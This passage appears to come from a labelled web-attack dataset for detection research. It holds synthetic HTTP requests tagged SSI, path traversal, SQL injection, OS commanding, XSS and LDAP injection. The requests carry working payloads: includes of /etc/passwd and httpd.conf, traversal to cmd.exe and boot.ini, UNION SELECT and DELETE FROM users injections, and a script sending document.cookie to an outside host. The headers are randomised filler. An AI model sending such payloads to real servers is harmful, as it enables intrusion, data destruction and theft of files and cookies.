UA-Pixels: 8766x859
Via: 4.1 0.232.200.177:4, 7.3 127.159.87.14, 6.1 www.eetnf.tiff
Transfer-Encoding: gde8
Upgrade: beagd/0.0, 8at/9.9, elr/1.5, luY/7.5
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 053115321
~~~~~: ~~~~~~~~~~~

htio=)   ( |   (uu=xhhhl*)&cdr=ttAmfeC5&8setnultnw3rt=9Aoexp_a3haq9ty&ifmp8xarse=stesheTtdee7otUO&toeoaLre=rnvs&YkabS=sXa  Hnf&homeNcBLGQKp3=4679117&dh=ezo&5xtermsr=rzjxPeDPa&ibjn_GJobjectWvw= 2dH&agalaSkm=includentb

End - Id: 37713
Start - Id: 39618
class: SSI
GET /edrteBsbclto6/oLnGXd/nVnFc-WjpZ1@cusqBd/uTnyeTe5ydprda/svGRF/txHgEA2B/eMawee7oie/cIiuexecxvbodynmO3/m2e9Ads2mgs.jpeg?zpS=iQ3jD-DmQz&erfEe=5bfh&lo=7&Goseldssbsr=%3C%21--+++++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&tbiotnig=uupdateaoese&nsr8b=mKuVrX HTTP/1.1
Host: 108.56.169.21
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, gzip, deflate, identity, identity
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 79.170.36.207
Cookie: tcr=m0stgottok;nOoatezhuhM=51692
Cookie2: $Version="78"
Date: Sat, 18 Jun 05 23:59:01 UTC
ETag: W/"nXLxjQhgJIFjcXESD"
Expect: espr=n9era
From: ts3vhh@kqzfn.com
If-Modified-Since: Wed, 01 Oct 08 17:21:22 GMT
If-Unmodified-Since: Thu, 07 Dec 06 14:15:59 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Jun 08 06:54:48 UTC
Max-Forwards: 6000
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="a2a9"
Authorization: Digest response="80ED7f1eeBb8A0AEa6E9F90FED316EBa"
Range: 973-,-4,32221-
Referer: http://siea9sm.gov/Jshn/jelT.jpg
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: nrme4e/8.8.7.5.1
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 9.9 203.134.160.122, HTTP/2.9 79.118.137.140, 8.9 15.6.109.22
Transfer-Encoding: gzip
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39618
Start - Id: 45574
class: PathTransversal
GET /Naerctit08eueog/omCvu-k1wd0Xk@IkZM3M/jc6tnsesoa72iuhoepia/onqAeinatgonorf/oltamlueod/rFFP/fnnn/TX5Ucfpi.asmx?7-DPda=Ett%25inputn%3DOqhio%28g%5D&0teexncar8lEs=laogi&ordocument28-Ae=mv08&bytumsdr=iIr+&dohuetdlaeip5om=o%3A%5Cwindows%5Cboot.ini&emi=odC1rScUx&3-5s@h%uvtelnetM@=d5emsojc&nrftihcdaaiqerp=essA0Iehc6heiclT&e9e5ccapoa7tmn=8068550&9be=8388796&uilbenLo=62804413&hvYQ_x4@Lwindow.openf=d%3B+dregst06&5ber=eII2m6x7xS&GD8caU0linktelnetw=872594&esuNR=8521 HTTP/1.1
Host: 226.166.147.16
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1254, euc-tw;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 80.183.70.158
Cookie: gemtrez=1317;enu=6608719;IT2x=228;sah=tqxzH;Xlocationca04NaZS1R=Tdgeeas
Cookie2: $Version="74"
Date: Mon, 09 Feb 04 14:15:41 CET
ETag: "INZLiNJ9EJe5m7Nfb"
Expect: chatt5r=iate7c;ywiims=cuttsa
From: wtdlbok@elsFbheed.st
If-Modified-Since: Wed, 01 Dec 04 20:22:48 UTC
If-Unmodified-Since: Wed, 13 Oct 04 09:03:55 CET
If-Match: "X9aWOG2g7DkPiP2AKB_"
If-None-Match: *
If-Range: *
Max-Forwards: 6079
MIME-Version: 6.2
Pragma: Msdt=NoJexl
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: NTLM ckRJdHR3ZThjQWlzYTNybmhleG5Bc3JzZXNhbnNJZWNp
Range: 1114-,947393-
Referer: http://www.tdicaX5.de/Taoa0/uujaNqs3/meh5/daeWrr/Aenyc7.jsp
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 7.5; ng-ot; rv:7.0.1) Gecko/74847544
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: HTTP/8.3 121.105.177.252
Transfer-Encoding: compress
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45574
Start - Id: 41720
class: SqlInjection
GET /V_3/AlXdK/Dsrnsa/laatdbdsenaAe/8EgaseccnuesoipeqdE/j09M0a2p/tqw.png?EYHm=p&8N1buHW.@DU=14776&ncaiatmoyntne=rcs&togOwlrjt1iyews=axNRm&eboeMs8m4utjO2=%27+++++%2F**%2F+OR++++%2F**%2F++++%27cFtrbrxy%27+%3E++%27S&FI5dP4N4dsystemg=q9d%401We HTTP/1.1
Host: www.ysi98ONldf.net
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, windows-1250
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 118.213.186.63
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="483"
Date: Mon, 12 Oct 09 21:15:23 GMT
ETag: W/"Skmf9ETPm2sCSTzQ"
Expect: 100-continue
From: daatsa@4adiaM.fr
If-Modified-Since: Fri, 04 Sep 09 21:14:28 GMT
If-Unmodified-Since: Mon, 15 May 06 09:13:07 UTC
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.0
Pragma: en=3
Proxy-Authorization: Basic cnF5cmFkbWk6N2kzM2Q=
Authorization: gtytt hyuNti=0iath
Range: 018268-
Referer: /eooc0ep/f2hqo64.php4
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: xGSCF-S2mR http://www.hhekq.biz
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 431x0868
Via: FTP/1.4 57.123.195.248
Transfer-Encoding: compress
Upgrade: aah/4.0
Warning: 604 www.Tomsiqie.jpeg "nobubdd9hsyeftiJigo" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41720
Start - Id: 43989
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 168.165.149.154
Connection: nioori
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: compress;q=0.1, compress, deflate, compress;q=0.8, compress
Accept-Language: *;q=0.0
Cache-Control: apwSpA='c'
Client-ip: 60.172.21.158
Cookie: lictMeO=ns 
Cookie2: $Version="49"
Date: Thu, 01 Apr 10 06:32:37 UTC
ETag: "eWaaxQ@0tex2f3f4WX"
Expect: 5titid9=sseu
From: 44fa@mshrPyo.gov
If-Modified-Since: Fri, 21 Dec 07 21:37:06 GMT
If-Unmodified-Since: Tue, 31 Jan 06 13:49:11 GMT
If-Match: *
If-None-Match: "S7aGc5OXUPvl1LMd"
If-Range: *
Max-Forwards: 14
MIME-Version: 9.9
Pragma: remcbotW='r'
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: NTLM YWlyY280MXRqaGd0dGVlc21pZnQ0bEFrb29mZVJnZFM2
Range: -2,795-,-91
Referer: /mEm2s.sh
TE: trailers
Trailer: Referer
User-Agent: gOfylr http://www.l1iEncir.uk
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.1 www.trohA2sS.gif, ehd/3.6 250.138.35.59:99, ono4wp/7.1 www.edd8oooe.shtml
Transfer-Encoding: identity
Upgrade: xg0/7.5, les/7.5, issPe/6.0, n7r/7.1, elo/4.2
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 1714241
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43989
Start - Id: 40668
class: SSI
GET /sh7heob9avhe/wanfnot/dDLcvOdG4-yF/aDZa2n80/wK9fm3vmr4T2Hn0h.css?Ilui=tRPUdkK6&tTbnmoofyanevc=%3C%21--%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&cTh=dw8i%3A&qUcc=9 HTTP/1.0
Host: 129.110.132.160
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesesimp, windows-1258;q=0.7, iso-8859-5, x-mac-korean;q=0.9, iso-8859-8-i;q=0.3
Accept-Encoding: compress, identity;q=0.7, gzip;q=0.6
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 164.125.136.123
Cookie: jn0Tt=2475;iinmoCsel=eGdbocweo@a xp_eputa ;nt2h9ObhbIwaoi=49708;tpetsttonesjM=52589948;tdcsa1aumj1tmil=5758070
Cookie2: $Version="3"
Date: Fri, 07 Jul 06 15:18:12 UTC
ETag: W/"Q6J6OIeUtDDNbaVKZeC"
Expect: 100-continue
From: hteeprhr@4tIt.it
If-Modified-Since: Sun, 23 Jul 06 05:27:52 UTC
If-Unmodified-Since: Tue, 25 Jul 06 22:55:01 UTC
If-Match: "kfdn1RX75_0zJqGC94"
If-None-Match: "7m.CucHczp5Y6Y3m"
If-Range: Thu, 08 Sep 05 24:33:23 CET
Max-Forwards: 9
MIME-Version: 9.9
Pragma: no-cache
Authorization: nhNb Ddocr7n=Tpxcise
Referer: /zntansN/3ogtsC/vser0ot/s2at.fgf
TE: chunked,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 7.8; gs-oJ; rv:4.2.2) Gecko/04375396
UA-CPU: MIPS
UA-Disp: 395,6940,8
UA-OS: Windows 98
UA-Color: color32
Via: FTP/5.3 www.aAie.js
Transfer-Encoding: olnood
Upgrade: Ieaz1d/7.8, tans1/5.7, lea1/1.7, 8viely/9.9, eeton/2.9
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40668
Start - Id: 48013
class: XSS
GET /yBN7Pt/oaNeHGc..v.yWVNL1J7/sbQ/oaasdeShli/aFxoPfbJG1eNg5_juq.jsp?Jiframe0dBnull2Nei=3078858&twXeOJeV51uT=59668&formaNFvarGT=na1&atged=scriptalert++%28tjnUm6htli8jes.0Rtl%29script&ke8e6ERihhee3=0219&ehkiisNli=mu%40MYo9.r3Sl HTTP/1.1
Host: www.orirdivd.gov
Connection: brcts
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip;q=0.9, identity;q=0.7, gzip
Accept-Language: *;q=0.9
Cache-Control: glitbcuY='arah'
Client-ip: 94.214.147.18
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="1"
Date: Mon, 28 Mar 05 21:03:10 CET
ETag: "mJXtu2Cs.k@CXBnl"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 19 Sep 08 05:30:21 UTC
If-Unmodified-Since: Sat, 29 Sep 07 21:16:05 GMT
If-Match: *
If-None-Match: *
If-Range: "47gEF8Pfmlmsd6bmYoZ"
Max-Forwards: 6
MIME-Version: 6.5
Pragma: peT=AeocmOie
Proxy-Authorization: uedrde k86eh=jiih
Authorization: NTLM eTZwZGVlM1M3TTdpYm5pYWV0b3R1cmR0Q2VvaXJhcXNscnRBTmg=
Range: 5-,0-4,-81
Referer: /eh8rN/zm1KkE/xipi/h3oloojR/eptnm.asmx
TE: trailers,deflate;q=0.2,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.4 (compatible; Konqueror/8.9; Mac OS X; ctls)
UA-CPU: MIPS
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9754x5278
Via: HTTP/2.2 195.251.247.54, 9.5 www.nwBry.htm, 5.4 www.qottglE.htm
Transfer-Encoding: gzip
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48013
Start - Id: 39540
class: SSI
PUT /esEfi3rrtheohbcirpeo/rb72ti0aenlbs/dzqQ2patlsdoul/cfdan9sehc/b9oeaenD/h8K1hHWzm/gSTXihqtIdeletezPjsam/omb/os/sXE2KEXA7A-zt.shtml? HTTP/1.0
Content-Length: 162
Content-Language: a,qM5a5
Content-Encoding: gzip
Content-Location: http://www.nsf9.uk/l6d4gt/eet27Ib/atqydaoe/hxf4/maiwCte.pdf
Content-MD5: QWVnYTlzZGQ2bW1lc21hdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Jan 06 12:10:21 CET
Last-Modified: Sat, 03 Feb 07 16:39:11 GMT
Host: www.dpyor.uk
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-turkish;q=0.8, us-ascii;q=0.3, windows-1258;q=0.8
Accept-Encoding: deflate, deflate
Accept-Language: ltuh-NwHl9, rea-l;q=0.4, m6ulter-na;q=0.1
Cache-Control: no-store
Client-ip: 94.165.84.44
Cookie: oienetgeNcA=9009;nonsteerihg=trnfov/d1eid|osl ;netcatXvbscriptRM2U.-=eFBix7A5p@;eflitd5mosgHU=8132176017;viseurat=sp9ebrOtseibnwehs
Cookie2: $Version="21"
Date: Sat, 30 Sep 06 01:13:02 UTC
From: Bdpnrgse@epebjds.it
If-Modified-Since: Tue, 27 Jan 09 12:01:10 UTC
If-Unmodified-Since: Mon, 25 Jan 10 06:10:34 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 46
MIME-Version: 5.2
Proxy-Authorization: Basic Vm5zcmFwOjI2aWtvc2Q=
Authorization: Digest nc=bf6CeAFC
Referer: http://www.3oyl6.org/zdcae/e62n/ne0l6ei/eicu/otel.jsp
TE: trailers,gzip;q=0.9
Trailer: Host
User-Agent: 4PNOQkTJ6 http://www.Uoekek.com
Via: 4.6 30.51.168.160, 7.8 www.cditnos.htm:214
Transfer-Encoding: i1ia7; rbihc=fhaN9o
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 494 189.159.212.31 "fthMulr0sla" 
X-Serial-Number: 1385275787999892465
----: ----------

ce5pt= E&trieb0sIft=lnduaa4&yL=naE&cus=thdW1&r.2x34IeuzOpasswd=In&tHlinkx_TLNRJh1=xmlt&on=<!-- #include  virtual="/etc/passwd"  -->&l3irnydt=966

End - Id: 39540
Start - Id: 41261
class: SqlInjection
GET /cQ8w_gp6u1hjc6o/wrXwCfdTR9zoHMd9n/o8no@XpW6U/enyt/noonwGrelmpLmlhA/931-G3shh-Ft/nlFFLYc_v.q93B3d2hTM.cgi? HTTP/1.0
Host: 221.62.161.75
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-874;q=0.0, windows-1258;q=0.1, iso-8859-5;q=0.2, iso-8859-8;q=0.7
Accept-Encoding: gzip;q=0.1, compress;q=0.4, gzip, identity;q=0.6, compress;q=0.3
Accept-Language: *
Cache-Control: z=mF
Client-ip: 14.225.9.11
Cookie: sois=3ynlike& dsmeth;iraitrTs=86;eolLtemmcteHr=sl5tnai1oi'   );DELETEFROMusersWHEREupper(username)   =   upper('admin;ntsrsoet=eaetyRcfnm2eenf
Cookie2: $Version="6"
Date: Fri, 07 Aug 09 03:34:49 GMT
ETag: W/"Wvv3CDJBxhFNvweH10T"
Expect: 100-continue
If-Modified-Since: Sun, 06 Jan 08 02:55:07 UTC
If-Unmodified-Since: Thu, 11 Oct 07 08:47:52 GMT
If-Match: "gjCTI27CAYs51FX"
If-None-Match: "0hp-X7WbmTcx7@Vh7zp"
If-Range: *
Max-Forwards: 333
MIME-Version: 2.9
Pragma: urada='rfO'
Proxy-Authorization: Digest username="htctmgeT"
Authorization: ontSes llrhn=Eirnka
Referer: /7n9t/dmva.tiff
TE: trailers,chunked;q=0.7
User-Agent: aloresdeiRxap
UA-OS: Win9x
Via: 5.9 200.252.40.231, HTTP/0.8 www.fwmm.shtml:932
Transfer-Encoding: compress
Upgrade: uaiiie/9.7, uslvel/1.2, jlr/9.6, aowern/5.3, alax/3.9
Warning: 913 www.neDrgei.htm "78trooeh5osOiE" 
X-Serial-Number: 31839527885705
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41261
Start - Id: 41452
class: SqlInjection
POST /3Y6K/thDi6/hegestajnCne8/eKzCBG_eqB/b9ce4to/lLII/EqODtQwU.php4? HTTP/1.0
Content-Length: 148
Content-Language: erm,P
Content-Encoding: identity
Content-Location: /hqvf.ace
Content-MD5: amVvcmVsN2xpeWtpcWlhTg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Jan 04 10:14:03 GMT
Last-Modified: Fri, 14 Apr 06 20:22:11 GMT
Host: www.nlshob9xls.be:80
Connection: close
Accept: text/html;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, gzip
Accept-Language: hlrese0-qfhgnd;q=0.7, nshTn-Nr;q=0.8, lhI-e0ie;q=0.8, casraam-5hac;q=0.9
Cache-Control: no-cache
Client-ip: 29.250.237.27
Cookie: toe5wXeihntl=nendnrI0dowhere;91moeetjes=tleogso1m;fe7eenfdepjD=4oeMesefMrn7tl8;llI7edrhxtetdb=m;cmd36WXmzDc=lsrexecirifp9ennlp;edwrktiu=nsO4k
Cookie2: $Version="65"
Date: Tue, 11 Oct 05 10:30:27 CET
ETag: W/"0T-9MndUn8_eYiCf9G8s"
Expect: 9andtaCf=tTse
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Sat, 17 Jan 09 03:23:13 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: *
If-None-Match: "QfP-JhQ.v17vLKhsSh_"
If-Range: "A6dE0CMJSLmqFf1d"
Max-Forwards: 99
MIME-Version: 2.7
Pragma: nren='eyd'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Digest qop=auth
Range: 863-,45-,1-
Referer: http://www.dx1oN.be/etege7eg/megixor2/2tgEeRho.php
TE: deflate;q=0.2
Trailer: Expect
User-Agent: rmzxnkhNjv/3.8.0.9
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: utnba
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 307 www.aiPaisn.jpeg:7090 "ttaoiIpDdouernxa" 
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

HemnhnJt76n5a='    union select  @@version,1,1,1--&u1o=7292712&kszat3roarul4=8897&nnne2d=et2tdzhacr4oteoeA&hho=oEzidMQ&s13w=0&NOVmNhB=rz

End - Id: 41452
Start - Id: 48076
class: XSS
GET /leoq/pO-MTd-sHZyYUX2Ay/pTEYY_/uh22QqW/fvexec_winnt4EowI.jpeg?XwhereRH=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.raalas.com%2Fcgi-bin%2Fseiereil.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E&efo=zZIanfwU HTTP/1.1
Host: www.raetcho.com
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.6, deflate;q=0.2, compress, gzip;q=0.7
Accept-Language: wassetf-Vts9hn, kOuenn-nsoato, rirtatr-Eft, hteam-o;q=0.2
Cache-Control: max-stale
Client-ip: 151.8.225.81
Cookie: ji5canbs=68987;jnes=os;n44sIet=yRZ
Cookie2: $Version="5"
Date: Mon, 30 Jan 06 20:02:13 UTC
ETag: "U9-YQ6G4Lm_.cAH"
Expect: el2z=ptrgaejs
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 25 Apr 09 01:54:50 GMT
If-Unmodified-Since: Mon, 15 Nov 04 24:06:42 CET
If-Match: *
If-None-Match: "Nvg0jxTzLr-Gcr9.lw"
If-Range: Wed, 24 Nov 04 08:48:49 GMT
Max-Forwards: 962
MIME-Version: 5.2
Pragma: afar='adhf8'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZmVodnNoc29lcmVlY290ZW9haDRhbnVyZ2Y4Tm9pbGVlc3VkVHVkdGZ1
Range: 5052-
Referer: http://www.isxdoe.gov/ieoter/fisrgR/haallSa/lqcam/Nvxfg.wmn
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: tilaG3Lasrdi3haa
UA-CPU: StrongARM
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: FTP/0.4 www.paasc.html, HTTP/8.0 www.reoh3soe.gif:285
Transfer-Encoding: gzip
Upgrade: urlbSi/7.2, soAe/2.2, syle/8.0
Warning: 161 187.118.43.218:03175 "iito86" 
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48076
Start - Id: 46118
class: PathTransversal
PUT /jFntKqJuPX@wFK/ILdxQF/ftrcfnlseltszNtni4j/sqLHXTW.Ae/nagmy/0Vksz.jpeg? HTTP/1.0
Content-Length: 98
Content-Language: 3qboohl,eZtw3,camoi
Content-Encoding: deflate
Content-Location: /enIl/icIiq/ehns/enscnle/Qaamts2.exe
Content-MD5: dHRhaWVodGV0ZWVjdzZoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Feb 04 14:30:37 UTC
Last-Modified: Fri, 15 Dec 06 17:25:39 UTC
Host: www.au5qohn.gov
Connection: zoral
Accept: text/xml;q=0.4, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lbya-s;q=0.2, t-irUyht;q=0.1
Cache-Control: no-store
Client-ip: 22.212.209.211
Cookie: 2fjh2@U.NXs0=38;ta8I=Rse
Cookie2: $Version="429"
Date: Tue, 18 Dec 07 09:12:57 UTC
ETag: "EHuaqPy5iHh-nHD."
Expect: wrwse8=toehqye;Sar7
From: heiqUte@jyli.cz
If-Modified-Since: Wed, 14 May 08 15:21:03 GMT
If-Unmodified-Since: Wed, 18 Jun 08 08:40:35 UTC
If-Match: "_Mr7eIsEX@D_CLSG"
If-None-Match: *
If-Range: "fjIu4phGvI0iXhU"
Max-Forwards: 0082
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5-sess
Range: -03018,-4474
Referer: http://www.oltEh.org/daa0rn3.avi
TE: gzip;q=0.8,chunked,trailers
Trailer: From
User-Agent: icrradsnnp
UA-CPU: StrongARM
UA-Disp: 282,781,32
UA-Color: color16
UA-Pixels: 744x629
Via: 1.9 21.20.191.145, 1.8 www.plef.jpeg, 5.0 www.sni2.jpeg:59774
Transfer-Encoding: deflate
Upgrade: cRpj/3.7
Warning: 748 128.223.205.211 "rct2raef1cbRxNsh" "Tue, 05 Dec 06 11:57:17 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

St5hnwn1ltn=t;m&roro8x7Ot=/etc/passwd&iie48elN=76131648&ta=mWG&mIeJthle=940&sleolotsine=1913

End - Id: 46118
Start - Id: 37501
class: LdapInjection
GET /tvsP-oOmD7/5hnnyankpymMe/b9userui7br/sKiWtG_hDM7JkF/gLGPW8J2mTFaCgoyc6/Es0oERjtoeSdm9o/tsrn/Wy/cia0/usqoosdnT.js?group byzdropJcmdarU1Gscript4=btio7%25d&nph-wgetwNqvIS=ol&aninuvraaqsa=2das9oloet&E1dt-o=%2B%5C+%7Ceehtpassui%253i+d&oisacihi=gaj3&h0dbtg=anhi%27 HTTP/1.0
Host: www.lciDcunz.cz
Connection: close
Accept: text/html;q=0.3, application/*
Accept-Charset: *
Accept-Encoding: compress, deflate, gzip;q=0.1, deflate, compress;q=0.7
Accept-Language: *;q=0.7
Cache-Control: ml0ee=2
Client-ip: 144.190.44.44
Cookie: lis4f1nlU=t6xx)(&(objectClass  =tdTa*)
Date: Sun, 28 Dec 08 05:57:30 GMT
ETag: "vesiSq3h4Zy5bs42VXPL"
Expect: 100-continue
From: G0Tehr7@TrsnATrdr.st
If-Modified-Since: Thu, 11 Aug 05 05:41:44 CET
If-Unmodified-Since: Sat, 16 Oct 04 12:06:38 GMT
If-Match: "QkID@c-Hmmp4FbIlA3"
If-Range: "M@@gVopR@56uAIwois"
Max-Forwards: 9
Range: -02377,787126-
Referer: http://www.icen.com/Maei9g/masxhs/adzlws.php3
TE: deflate
User-Agent: Mozilla/7.6 (compatible; MSIE 0.0; Mac OS X; sbiqi; stosr9b)
Via: 7.7 www.wizn.gif, 7.8 www.eaWj.html
X-Serial-Number: 222207

null

End - Id: 37501
Start - Id: 46119
class: PathTransversal
POST /acratOma4nlsted/rintcwa/laaedbyihb437dwhpt/rO2J.png? HTTP/1.1
Content-Length: 43
Content-Language: En8
Content-Encoding: deflate
Content-Location: /g8xs2ysh/iedn4n/r6Gdae.jpg
Content-MD5: dHRhaWVodGV0ZWVjdzZoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Feb 04 14:30:37 UTC
Last-Modified: Fri, 21 Mar 08 22:40:36 CET
Host: 37.23.230.114:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesetrad;q=0.4, windows-1255;q=0.0, iso-2022-jp;q=0.9, utf-8, x-mac-roman
Accept-Encoding: deflate;q=0.5, compress, gzip;q=0.8
Accept-Language: lbya-s;q=0.2, t-irUyht;q=0.1
Cache-Control: max-stale=71
Client-ip: 22.212.209.211
Cookie: 2fjh2@U.NXs0=38;ta8I=Rse
Cookie2: $Version="429"
Date: Tue, 18 Dec 07 09:12:57 UTC
ETag: "EHuaqPy5iHh-nHD."
Expect: wrwse8=toehqye;Sar7
From: heiqUte@jyli.cz
If-Modified-Since: Wed, 14 May 08 15:21:03 GMT
If-Unmodified-Since: Wed, 18 Jun 08 08:40:35 UTC
If-Match: "_Mr7eIsEX@D_CLSG"
If-None-Match: *
If-Range: "fjIu4phGvI0iXhU"
Max-Forwards: 33
MIME-Version: 1.2
Pragma: YAgdaomm=ra
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5-sess
Range: -03018,-4474
Referer: /r66oas/be7e7/nmuieu/Gtsnoni.rar
TE: chunked;q=0.3
Trailer: From
User-Agent: tndmntrhtPeuf
UA-CPU: StrongARM
UA-Disp: 282,781,32
UA-Color: color16
UA-Pixels: 744x629
Via: 1.9 21.20.191.145, 1.8 www.plef.jpeg, 5.0 www.sni2.jpeg:59774
Transfer-Encoding: gzip
Upgrade: cRpj/3.7
Warning: 433 88.153.253.218:7556 "oaenugabowmv" "Sun, 04 Nov 07 02:57:20 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o5pnorf8yyr=T:/.htaccess~&Eo=95862270

End - Id: 46119
Start - Id: 39592
class: SSI
GET /omef/iAtziTyo/cmrZ6PYwI2XrJp-/r9ekt7cooogF/rBjM.y@e-.shtml?zehmobgaheOerol=eIhach0sclrifcu&Lgn9u=%3C%21--+++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E&hoqty=sTW30Law.h&ReJ_fP-Bb=turHEf&lnodeYPr=88&stsoobta=8499067&atyeilr7gl=17799&IZyW=4nheuthN&IrD5rxh2Osirp=6083271992&9oestjzn=tEQand&ecx2iYl6pntutr=gYpbQsdfqL%40&unnSIo=6468278674&rwmcsDar1i=%3Fn+rp HTTP/1.1
Host: 254.161.248.147
Connection: keep-alive
Accept: audio/x-wav;q=0.5, image/jpeg;q=0.7
Accept-Charset: x-mac-greek;q=0.4, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: Wfio0p='Swdt'
